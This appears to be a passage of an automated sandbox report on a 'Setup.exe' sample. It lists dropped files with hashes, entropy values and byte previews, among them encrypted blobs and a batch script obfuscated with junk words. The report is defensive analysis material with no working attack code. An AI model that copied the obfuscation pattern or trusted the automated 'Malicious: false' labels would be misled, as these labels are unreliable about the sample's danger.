SSDEEP:	1536:mKu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+9:mccBiqXvpgF4qv+32eOyKODOSpQ9
MD5:	107384EECB2DA158834810CADD63DB1D
SHA1:	0664FDF4E753BE53C7A24F9728FDA9B974E0C6F6
SHA-256:	6E59F87F721877DE6C3FB505EB80F247CDD1631DC9D5A39C290E7852E0486D3B
SHA-512:	69DBBD87AE1264E3D915DCDD943ECD708F2CAB68377AA49DE6F6E4893E3A9D988F4CF43489B819C1FF320C86BC0C131227889B154E06A8ED9D7DF39C12959510
Malicious:	false
Preview:	...u...........t.3..+...t....t..E....t....t....t....t.3.F....3.@_^[].U..SVW.u......Y.w....M.3..U......."...9p u".:csm.t..:&...t...#.;.r..A ........B.ft&9q.......9u.......Q.u..u..+..........9q.u...#.=!...r.9q.u.;.rh.A .....t^.:csm.u:.z..r49z.v/.B..p...t%..E$P.u .u.Q.u....u..u.R....I.... ...u .u..u$Q.u..u..u.R....... 3.@_^[].U..V.u............J...^]....a.....a...A...J.....J..U..E....P.A.P.......Y..Y..]...j<h..L.......E..E.e...]..C..E.}..w..E.P.{...YY.E.......@..E.......@..E.......x.......M..H..e..3.@.E..E..u .u..u..u.S.A........].e.......u..j...Y.e......` ..}..G..E.W.u..].S.........E..W.3.M.9O.v:k...].;D...].~".}.;D...}...k...D..@.E..M....E...A.M.;O.r.PWj.S.Q......3.].!]..}..E......E............M.d......Y_^[..}..].E.M..A..u..t...Y......M.H.......M.H..?csm.uK....uE... ...t....!...t...."...u*.}..u$..t .w......Y..t..}........PW.(...YY.j..N'D.......b....x..u..e.......N....M.j.j..H..o....M....U..E....8csm.u6.x..u0.x. ...t..x.!...t..x."...u..x..u......3.A.H ..].3.].U..j..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Por

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	7.997660053100181
Encrypted:	true
SSDEEP:	1536:SCMkNlNE9gte8AOgvV/jqM5KKZ5AeHiH1lI6eDHlnBCBZLKjYD:UkNzuwe8ArtjfKW5AeHiDMFnsjWYD
MD5:	F4E6D03F4E390F19328A680177C5FCA9
SHA1:	8F92BEAB6D41AFEBEC2FD10D2BBEE356B01B2F98
SHA-256:	CBC24E653D2508B148BB360D61EE7CD89AE955B62DF5930917E04C81AD4B5933
SHA-512:	0E297F43B28BDECC45BA7347F8878900E23A500A3E1D4433CF24D5F95E7E9FE90348DB03EF2C65527AE353412C541AD752946F1BC2A183C5C59960DBD85D328F
Malicious:	false
Preview:	..\w."..n"K.j...p..d.4.......-.....9...W..P..p...)......w.Z.......Z.....i.]+^aJ.q.d.p..i....kg..E@...^.(...$}..u..E........O/.1B.bF...&]+.....N.'...Ip.....,...aW.R....R...rb..../...sn6.'".=.Pb......,/...po.N#n$.......'Eq.v.3...gdl.,.d...........RJ...o.b.......On<.....E...n.b....[...$..\..,..nA5(B^}.W..mN]uo'Q.a'.PEv.c.N..c..9K..O.....']B...]...kId"k......s....:.E...;..n.......u...4+...=.......@W.E......"...}....O....D..,.Rs/........!.w......E.P...y>...m.....N.......X. .j.Zh.S..D......G...xO.a.0.mR`C`.S&+.-$...M..I .kl..pA.,oE.R...+F..v..R...U..P67V{.U...P...).Zi/.d..x...=......F...........JcB.y..j..X}....0.........G....D\.P.....xp....4!...K.><..Q.5.Q.Iw.....X.....WJ:.3~..P....r..fU.+. ...Jl4.O."..Q.Nd.....d.".+..F.Q.oJh..gSO..r0..gk....%.. ~..T..Y,Gq..?..;.....0. )...%...I....p.../..Fk.\|p.%@."$..2G`N..t.#.....L:.gK.W...sY..gp...\s........D.!2..3Q{..,......4....@..j...z....3...$?...S.YM1/aI..n.K..]f.E.........65.....6.:......D.o...R..-.Q..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Pro

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	ASCII text, with very long lines (1196), with CRLF line terminators
Category:	dropped
Size (bytes):	25790
Entropy (8bit):	5.118206026226683
Encrypted:	false
SSDEEP:	768:vd0EI320MMEOa7sEs08jrZXuSKIsN2k2aR:vyEI32FZgEs08jrZ4I0Tx
MD5:	54EB36449AB759E10CE3443AE25A91DB
SHA1:	7E89315519CF3DCA34293DE9B0549AFCE88F55FC
SHA-256:	E1ADDF9E29ACCF50DA83B64476C59783FD1CD8CE968A0F6C4345D383034F344F
SHA-512:	5BB3935934B0B4242A8D7774EC99AED19AC11DA6B1E4193C8D2DC1797883140A94769E245309E01B8974E9C0EB15A09EA54209B4E2140C50E65DA7558280F3EB
Malicious:	false
Preview:	Set Surface=r..LhLobby-Roman-Slut-Smithsonian-David-Nottingham-..HJxSpouse-..fVSRecall-Hospitality-Fisheries-Una-Hungarian-Booty-Suite-..WcJOAlerts-Brain-Funded-Qc-Acquisitions-..WDXeSg-Slut-Caribbean-Conferences-Models-Chick-..fEqgTransformation-Operator-Benjamin-..XYfThank-Switch-..zWTechno-Edt-Content-Univ-Cheque-..zLuFPm-Downtown-Scene-Quad-Gossip-Configuration-Initiated-Renewal-Shemale-..Set Education=Z..HvApparent-Computing-Met-..wpjDTuition-Rpg-Together-Notified-..QlMajor-Entered-Receiver-Alter-Healing-Novels-Spas-Deer-Gallery-..SniEnquiries-Lopez-..jEUuHeadline-Trace-Months-Scripting-Mess-Leg-Naturally-Debt-..aGzFeature-Purchasing-Determines-Over-Motion-Reached-Pittsburgh-..Set Fla=P..ZMiMarco-Stocks-Child-Hat-Lows-Syndicate-Photo-..PvbCEbay-Carroll-Nasa-Issues-Ranking-Aquarium-Hockey-Formal-..WfQpBrowser-Boring-Express-..UduChampions-Lips-Textile-Bill-Lazy-..ntXNAlpine-Am-Hebrew-Your-Carry-Distinction-Preferences-Rb-..HVSFlags-Mass-Marie-Since-Jersey-Becoming-..jLPAwareness-Mo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Pro.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1196), with CRLF line terminators
Category:	dropped
Size (bytes):	25790
Entropy (8bit):	5.118206026226683
Encrypted:	false
SSDEEP:	768:vd0EI320MMEOa7sEs08jrZXuSKIsN2k2aR:vyEI32FZgEs08jrZ4I0Tx
MD5:	54EB36449AB759E10CE3443AE25A91DB
SHA1:	7E89315519CF3DCA34293DE9B0549AFCE88F55FC
SHA-256:	E1ADDF9E29ACCF50DA83B64476C59783FD1CD8CE968A0F6C4345D383034F344F
SHA-512:	5BB3935934B0B4242A8D7774EC99AED19AC11DA6B1E4193C8D2DC1797883140A94769E245309E01B8974E9C0EB15A09EA54209B4E2140C50E65DA7558280F3EB
Malicious:	false
Preview:	Set Surface=r..LhLobby-Roman-Slut-Smithsonian-David-Nottingham-..HJxSpouse-..fVSRecall-Hospitality-Fisheries-Una-Hungarian-Booty-Suite-..WcJOAlerts-Brain-Funded-Qc-Acquisitions-..WDXeSg-Slut-Caribbean-Conferences-Models-Chick-..fEqgTransformation-Operator-Benjamin-..XYfThank-Switch-..zWTechno-Edt-Content-Univ-Cheque-..zLuFPm-Downtown-Scene-Quad-Gossip-Configuration-Initiated-Renewal-Shemale-..Set Education=Z..HvApparent-Computing-Met-..wpjDTuition-Rpg-Together-Notified-..QlMajor-Entered-Receiver-Alter-Healing-Novels-Spas-Deer-Gallery-..SniEnquiries-Lopez-..jEUuHeadline-Trace-Months-Scripting-Mess-Leg-Naturally-Debt-..aGzFeature-Purchasing-Determines-Over-Motion-Reached-Pittsburgh-..Set Fla=P..ZMiMarco-Stocks-Child-Hat-Lows-Syndicate-Photo-..PvbCEbay-Carroll-Nasa-Issues-Ranking-Aquarium-Hockey-Formal-..WfQpBrowser-Boring-Express-..UduChampions-Lips-Textile-Bill-Lazy-..ntXNAlpine-Am-Hebrew-Your-Carry-Distinction-Preferences-Rb-..HVSFlags-Mass-Marie-Since-Jersey-Becoming-..jLPAwareness-Mo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Rhode

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	6.740332032697208
Encrypted:	false
SSDEEP:	1536:ch+I+FrbCyI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1Ci:cAU4CE0Imbi80i
MD5:	45A445F09FB45D77A1637CA417C862A9
SHA1:	18002B762F6F25863933FCB508B7F2E70625FBA1
SHA-256:	E3899BC261D59F3E65B1AAAADAB15763A4B575C0C7B2B2BB9E689DDE138352D2
SHA-512:	61B7A4C41C79A78D660E666875941E4376B358FB67A092858F677F7FCDCE62EC5F3A18898C02D0B35DAE25AB0EA8D0F947431800AEFE74F1361612C71363B9A7
Malicious:	false
Preview:	.+E.[.M._3.^......]..U..W.u..\|..Y.M....I....u.............E.j.Y...............E..@......t.......".....E..@...t(.E..`...E..@.......E.t..H....E.j.Y....!..E.Sj.[.......E.j.Y....!..E..`...E..@......u3V.u.j..3..Y;.t..u.S.3..Y;.u.W.....Y..u..u..7...Y^.u..].S.3...YY..u..E.j.Y..............[_]..U..W.u..~{..Y.M....I....u!...........E.j.Y.................E..@......t........".....E..@...t(.E..`...E..@.......E.t..H....E.j.Y....!..E.SVj.[.......E.j.Y....!..E..`...E..@......u1.u.j..2..Y;.t..u.S.2..Y;.u.W.....Y..u..u..$...Y.u..u.V.....YY..u..E.j.Y................^[_]..U..VW.u..hz..Y.M...I...........M.3..A..1+.@...E..H.I.H...~&.E.V.p.R..........E..H..E...3.;.....d...t....t.....?...k.0.....M......L..@( t.j.WWR.4..#......u..E.j.Y..........j..E.PR.$......H....@_^]..U..VW.u..y..Y.M...I...........M.3..A..1+.......E..H.....H...~(.E.V.p.R...........E..H.f.E.f..3.;.....f...t....t.....?...k.0.....M......L..@( t.j.WWR..3..#......u..E.j.Y..........j..E.PR.R.............@_^]..U..]./.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Standard

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	63488
Entropy (8bit):	7.996662637284283
Encrypted:	true
SSDEEP:	1536:GCWv4VnoTxK2S0c4aA/6iElF5q5DBU7767:1exKCc4LSBF5sVg7G
MD5:	C6B690C142A9B19CED3D7B0FD634BC36
SHA1:	0CB9046DED56C3C4171C228B875183A25672832E
SHA-256:	78D8E7829425F7C439633A160DAC171ECFA02020A0BDD50715E4B7C8A302898E
SHA-512:	6596950394E5FD5A997EA3E42EAB9B9320FF8C88FE66A1719B02F0CAB6DD6CCFC384E7FDC0D71D8E1F8FDD2E42EF0843CC3AC25DFC6C40EAF30448FB499A5D2F
Malicious:	false
Preview:	.}....-o.:A...z.-.......`...`.i+.D...{..5q.n...Sf.}..0.Yt...5.zh.:.}..W.0{..^..LW...I.L..N...RU.hR6..O._p.C..N..~.k'...j>.~....:...m...7.^W..=YleB.B?..Y.-........?..^..Y.........~..E5(..\!..%h.....V5D.].L..D.m...m.......~.e.P..e.f.....no........._v.w..-..zc/..{...B..I3.b..+r...V.Ry.N....2h\...v.P..W.g..,.z.Qh....q.L.+.].[x_....&4 .)<8...;.4.!..y....J..w..Bx...b.......0y..TP.Q$..%....i..>gk~....U.6iBR...xU..I....U......jw..~.z...Aq.....F...7.[..B....l..8.w... .Ng.k.'......r\|.c.`h...&q.~'Z..ySh.bqE......)...oo..:....PRd.5H.H9.......q.74y.40.].. ..i..<-c)z.k.\b@.~...J..+&...,..u......%.!-.9.........E.LH.Q........P.&.S..~!%!#(........l$...$...<.Ll....&.G......,&W.3...Q.R.I...;.*a.._..../...v.x..5.p...}...I\a\|n..J.-.QR...DU.t...O.5.....W.L..o........ygA..F.........Nf...5"G...[.r?G...;D4.J. )}'..f....>{.WS......:.7.a3..M-.g,...VP...........G..G.0?..Z.......[cv1.......o=..i.Z......S...qN@....X\.bB@.. ...e}^.`b.{.........+L.G....5.[..7...R...c..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Tape

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	6.560722856456054
Encrypted:	false
SSDEEP:	768:/Q18OWrM81EyJqx9EdzGGXZVfmlqTmN5WAQIGK2ud5lS87uzh7JCQ/sE7mOB6XSe:o1/AD1EsdzVXnP94SGGLpRB6M28e5
MD5:	07160C4C31BB60A54A0A5E5A37A5FF57
SHA1:	A9317BDF0F026800E922AACE917ECD5968928B32
SHA-256:	CFDE7BDA8B3F49A6305521633099EAFEA950218CC02FD3495210AB9A7FFF0A66
SHA-512:	692E6E90772EE0D722361219BA63AE94BD21A128D4C2CAF877CB75649A107DA9FD40DE0AD4DA5E571A5F7AA128D49BB55D6FD59BAD2B9FDB01483E2D968DF9F9
Malicious:	false
Preview:	.Y.hs'D......Y..r...hx'D......Y..\|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F\|U............[............u......3........................l.....p.....t.....x.....\|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Tapes

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	75776
Entropy (8bit):	6.707609077111718
Encrypted:	false
SSDEEP:	1536:4QlHS3cctlxWboHdMJ3RraSXL21rKoUn9r5C03Eq30BcrTrhCXp:llHS3NxrHSBRtNPnj0nEoXp
MD5:	94A13957E74D34E45522B7153DBCEE6A
SHA1:	3B86D1946863CF98D67CF26BFE9A767AEEB63917
SHA-256:	4ED927C074565C4456DDBBF987A4CBA769C6B8BBD43453B0135590F28D025C4E
SHA-512:	F2D28E010DF30E9A204C8EBD62105A945E1A8EBCAAA9DFEE31C77480D20411A35731BCBB9A775802BAA56975C82F1898A2DCFC0F8A422217810D1E051BACDACA
Malicious:	false
Preview:	E.hTE.STE..UE...A...A..TE...A..UE.UE.HUE.rUE.rUE.]UE.[\E...A...A.0\E...A.E\E.p\E..\E..\E..\E..\E.\]E.b.A.b.A."]E.b.A.B]E.u]E..]E..]E..]E..]E.d^E...A...A.9^E...A.N^E.y^E..^E..^E..^E..^E.?_E...A...A.._E...A.%_E.X_E.s_E.._E.._E.._E......G..F.....?.......j..3........P..l.I..7.6....I.....s....6..p.I.j..6...............T...j......................t$P........A......1.p..q..............j...........A....@.........j..........7.9.......Sj..\|..........Y......;.t.P....X.......@..C.[....x.......j.....U...<...E....]..U..\|....E......]..U..i....]..C..^....]........X....M...Q.K..i....E.....U..4....]..4....x........j.....U..N<...].....9....E..S.........3..............[.............x....K..E.P......].......3.. ....u..jz......u...t6.F....F..8.u..6.z......j..v..&......j.V.........E......E.......................$.'nE..E.........P..p.I.j..u......-V..j.V........_....u.....T....N...V..j.V.......<....u.....1......r{..j.V............E..p.......j..u..e............M.........Q.X.........M...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Tiny

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	138240
Entropy (8bit):	5.6990862996216345
Encrypted:	false
SSDEEP:	1536:UtmgMbFuz08QuklMBNIimuzaAwusPdKaj6iTcPAsv:UAg0Fuz08XvBNbjaAtsPh6f
MD5:	ECB9C6DC9AD4597C97435CC85750CBDC
SHA1:	E9449DCB82942A6D63E2531155C978850DCA326F
SHA-256:	771DCFF1553C7149282FD15FC9644F256B7A97FD8EEC68B11019EF258C90D6D4
SHA-512:	A67CB36C260E72C13A566313B2761B9DE29B4DE3661A92190DF9E82FCF6E2EE3FD7FBA643FBA0DB5003761B4EAED75FB279DFD5E55CA93AAD3A49342D2F709F8
Malicious:	false
Preview:	.Pex?0..&..=..X...y?....8..=...<8.y?!.({=.H=.. ...z?.d,G..B=....6K{?...E.M=.....\|?w.3.1.!=....L.\|?..^.X-F=...<.w}?0...!.O=....y1~?\|"..Q<=..$...~?..k.f.@=...+...?...b.UC=....4/.?.K_.<=..<..t.?...x.I=...2..?wY.V%A+=.......?x.+s7.E=..8#o..?.e..fE=...\|R.?K.s..E=..T.8E.?.=....(=....!..?..)...G=.......?#F...K=..V..[.?...C..<..:..?k.V...I=.......?.....YH=.....r.?.q..4';=...~..?...=.S7=...'.,.?7...X.#=..4...?C..k..7=..bB..?..E.pC=..B..C.?'.2x.k==.....?.WU..A=..xm..w.$..V.cE.....v.K..[..7....G.Qv.e$.l..F.......u..y...H....g.u.\|...%I......=u...?..FK.......t.S'.q.! ....Y.t..L8\|..H...dw.)t...v.#.L...l&..s....>..D....f.qs.g~..7.(....7..s...6..uE...(...r.uv...E,...t..]r..L..v.O.......r.....p.....&..q.C.."5.F.....zIq.o.....O.....j.p.......O...\|.W.p...../N....#D5p.O.../3N.....^.o....I..!...`.1.n....D.CE....".Bn..u..^!E....W.m....--.0.......l..N...pC...P&`.l......J....$ak.....N.....8x.j..[...-=...8R..i.y..~.. ....La8i.[..zF+....g..h.k<..@8K...H...g.}7...%.......g.mg.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Treasures

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	129024
Entropy (8bit):	6.563368941189123
Encrypted:	false
SSDEEP:	3072:28CThpmESv+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/D3:PCThp6vmVnjphfhnvO5bLezWWt/D3
MD5:	BEB2F7457062B1BD2CE48A07C870281E
SHA1:	24EA978FBE9E72B7AC57E1152B2151D53F628F6A
SHA-256:	EEA804F5DF6861D1E30BAC2738E9B1F1EB49F7C2C99C3DB0A9E6D04FB3346478
SHA-512:	3752EA20F5579BAF6586164242DA70A2ED6DB93F4BD774E29ADBE7B0378C54A34321300DE452EBA09C4472915631E8BB6441174E8B8E46728FD98A94A97C5D29
Malicious:	false
Preview:	h.EL....i...].{,.u.j.h.FL...{,.uHj.h.FL...Q...4....u....Oz......F......^j.P.E.P.:....t.......E.......X....'V...u.......z...E..F......>.@....x..u..........t.Q......._^3.[....U....S.].VW...C..0....!...V....E..B..E.B..E..B..E....{..v..C..H..\.....u..U....7....U....3...<.u..M..E.P......C.C..0...~!...v..M.........H..\|9...D9.t..@8.@......\|9...D9.t..@8.@...M...P.._^3.[....U..E.SVW.@...j..0.E.P.J9....t+.......E..]........@..p..x...x..j..{..3_.8...H..\|1...D1.t..@83.G.x..\|1...D1.t..@8.]....@...x...#..{.3._^[]...U....S.].VW...C..0... ...V.3.F...E..B..E.B..E..B..E...9s.v..C..H..,[..;.u..U.........U.....y....t..E.P.7...H..\|9...D9.t..@8.p..\|9...D9.t..@8.@...C..0.... ...v..M..X....M...N.._^3.[....U......l....E.SVW.@....\|$d.0........V..d$$.h`~L....D$D.B..D$H.B..D$L.B..D$P.......t$H..T$<Y......................+.F.t$`.........D$$3..........D$@.`~L..T$0.L$,..X.D$(3..T$(3...2.L$0.t$4f;1t/V.r......D$8.D$0Y...P.{r......D$8Y;.u..L$,.T$(.......\|$0..T$(.L$,u..t$`+.\|$dx......D$$@.D$$...t".T$8

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Usda

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	74752
Entropy (8bit):	7.997536141862939
Encrypted:	true
SSDEEP:	1536:AvanCmo7gXj/FmJXO/N+1rVTM4foJvOODX9mAE2eO6/lumiOD6C:AvanCmwgXTFcO/GhTZgJ2ODJleRNp6C
MD5:	DB05CDFC67E8FA19FE3314473B021CB1
SHA1:	4A1BE805C3DE4C2378A2905466451EDF95515139
SHA-256:	7E09F458385E5E70964A5FBF903A73B0773BD32421BCE4077A3C31522F5610D7
SHA-512:	523E0761CF1854592436BFF717A31A3832859E2A9F52E9BAFDE043B3D885CA19ECD7E747564BA5B58EACB73DD05EF97FA83C9C355864DD4E0FC56E3A5A27AAD0
Malicious:	false
Preview:	.7.].&W......]...j......VCI..H`}/+.?..\A>$..8..~.......W..7>.(....I.........E{A(..'....'.w&..i.Y....vY.6.5uV.a;.......QnQ....E.)]?&L.BW./.8..@.x..>.......+.,.........Ie..@{.......E.a.M........9..#.^N.sR.j.uTIr.\..?.u..W-i....._...\.F.[.......\...'j./.hY..}].B#...@7..3..jw0".../7R.s&M.0.d...'..DS...!.\.r..2..-_.N.P.T...K.....\|..Z......?......,....-..y?..$<Ms....s...Q)d...Lz..7..M...c..........9.}..IINt..i?.I.HD#.g..) ...Q........O....C.zF....r..1.,<?.1...N...........,p.3...Z.,.I.]..C..E....{......CK.W...Q....6..\|.......U ...m.....~..Sy......d.m... .Ub.%du8....X.A..o........{t.).....`..\|......q...q.v...8.P.Y..<c...^...."8z[b~...A:..jy.q.C.....O{..h.3>.y=..AQ.T@...*8....u..hr..Rk.E}.x^6.q..z......0....!..8..2f....._..W....\|..8.a....E...D....2h........L.E.L...P~.B.J}.@.wN.....!."....-......Q..z....3n.(.dj.>..~-8.m_.."..vo....,.NV.x,h_. ...4....V.(=j....k.+..<..uk..}m.O.l.<.q.$/.]7..%T)..J...K.s.....Y....8...!3...C..KY.-.,L...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Wiring

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	6.494473266117863
Encrypted:	false
SSDEEP:	1536:vCMIBZwneAJu7QnswIPumV3BxZxu6/sPYcSyRXzW8/uC6LdTmHwAND:KtCZEMnVIPPBxT/sZydTmRD
MD5:	371F168DD461FE5576BADA4E95B4D2B1
SHA1:	7A9FB727567EBC01C18BA12ABAAC7949BD386776
SHA-256:	3BE2C46E61F2E46A3145133FB9B61C5F02E9038F2D72CC9BD4B4857A39EF9A30
SHA-512:	2B050871BF010AE4B5E169AECACCB7A09288611C7FDAFECADABF22039247796821B1668EAA5C0368B76EF119D4C17F9082A5BCE3B15ECEE76EBBFEA123937FB3
Malicious:	false
Preview:	..9E.v2.u.......R..M.P..H...........................p....E..9}.r........p.....to9E.v,.u.......R..M.P..G..........................E.....E.;.......f...E.....f#E..E.....f;E.E.u.....E.;.r.........9E.r..M.+......f..f;.,...u....t^f.A.......f;.....u..O...........9E........M.+......f..f;.,...u....t.f.A.f;.....t...................U.f.z....`$.....t......R$..;...J$..f.:..E...."......U..".........#...E..U..."..3..$......M....f;E....$..f;....$..;.r...$...}.."...}....."...E..E........."..t0............"...$...D... .......$....<..x...;.w2.}...z..E..$.......t.;.s.f.......f#......f;.u.....E.......3.9u.t;..t...........;.s&.u.......R..M.P.r...........$.........E........}.9u....#..;....#..;.....vwf....up;.slf.?.uf.C.....u]...t....t....uN.w..u..I.........+..M.;.w&f..f;.,...u.......#..f.A.f;........#.........E..m....u..E...... ..........s!...T#.........J-......K#.......J#......!...M....~".U.+..u..E.+......0.x....~.+....X....... #...R..M....!.....\|!.......P.........P.E....P......9}.~..M....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllul9kLZ:NllUG
MD5:	087D847469EB88D02E57100D76A2E8E4
SHA1:	A2B15CEC90C75870FDAE3FEFD9878DD172319474
SHA-256:	81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
SHA-512:	4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
Malicious:	false
Preview:	@...e.................................,..............@..........

C:\Users\user\AppData\Local\Temp\5UHUPPG78GSXH8YIM9UYVJ0NVOM81L5.exe

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (986)
Category:	dropped
Size (bytes):	16791
Entropy (8bit):	4.431180163596247
Encrypted:	false
SSDEEP:	192:xSD+TD90sp7aSVbJ/CtzfWdYdKG7VhN3EpIJ5tFtQjMY5VhIJ+Ik:7azfVZ3LPQD6J7k
MD5:	2E59DF53309DBD234F876BAD5C73F5B4
SHA1:	BB243841CEA5D85A0E2849C949B9BB11CEB4FC33
SHA-256:	B73DF91C83960A7DCCE8F112B1F7E4DB8EC6B659D4AC706F79A1A703297533DD
SHA-512:	34C966EC7213CA502849BAC1BB6B18A3C4B30EC07EB8FFAA837D048ED853C15842256C6C2869F96ADBA2EB9994A85393CED0CEDC72B9A9DA8E08BB019FBB3E5A
Malicious:	false
Preview:	<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <link rel="icon" href="https://www.cloudflare.com/favicon.ico" />. <title>Forbidden</title>. <style>. body {. font-family: system-ui;. font-weight: 300;. font-size: 1.25rem;. color: #36393a;. display: flex;. align-items: center;. justify-content: center;. }. main {. max-width: 1200px;. margin-top: 120px;. display: flex;. flex-wrap: wrap;. align-items: center;. justify-content: center;. }. #text {. max-width: 60%;. margin-left: 1rem;. margin-right: 1rem;. }. main > section > div {. margin-bottom: 3.25rem;. }. svg {. margin-left: 2rem;. }. h1 {. font-size: 3.75rem;. font-weight: 400;. margin-bottom: 0.5rem;. }. h3 {.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_av1kmbxn.dco.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dfc2jmhw.bpm.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.418953689143475
Encrypted:	false
SSDEEP:	6144:sSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNd0uhiTw:XvloTMW+EZMM6DFyn03w
MD5:	D5A72A9B25726761F5FFE4C441D5CEBC
SHA1:	B23CCA5BB5CB0A730D41A70CE86ECEC285FB8BAA
SHA-256:	E56CC3509E64995963C76EA500CBDEB4839AB8DC93CC806D026D8732D9DBA806
SHA-512:	067D0A2332AFB636FAF8D0F1ED7D8D14BE6F26DC8C5D858D30DF95B5C33E07D4D343DC14F3E6394638C1DD893BCFF459E08A05F9E7F352AD37C973216A265C1A
Malicious:	false
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....c...............................................................................................................................................................................................................................................................................................................................................`.0........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.479410957472831
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Setup.exe
File size:	73'412'279 bytes
MD5:	380cef4cfa43fa74716059e3296850ec
